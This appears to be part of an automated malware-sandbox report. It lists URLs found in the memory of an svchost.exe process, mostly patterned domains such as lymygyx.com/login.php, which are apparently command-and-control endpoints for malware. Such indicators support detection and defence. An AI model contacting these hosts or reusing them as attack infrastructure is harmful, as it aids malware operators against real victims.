    Source: svchost.exe, 00000001.00000003.2536042650.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533385713.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532105233.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545206078.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535694034.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557869409.0000000007262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytej.com/login.php(
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyxoj.com/login.php
    Source: svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfoj.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793548404.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygyx.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygyx.com/login.php29
    Source: svchost.exe, 00000001.00000003.2828653969.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2829200303.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/
    Source: svchost.exe, 00000001.00000003.2828653969.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2834251142.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835191372.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2829200303.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/H
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811129520.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysud.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytuj.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyved.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyvin.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2501299413.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php8
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygyn.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477822370.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2782047194.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryler.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2503661966.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507955188.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590737779.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599822074.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2576640143.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php8
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2763990906.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytun.com/
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2591407589.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587032429.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvaj.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvur.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywur.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywur.com/login.php?
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613424581.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2597790042.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593819452.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613994929.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599093165.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxud.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822377847.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545527847.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjex.com/login.php
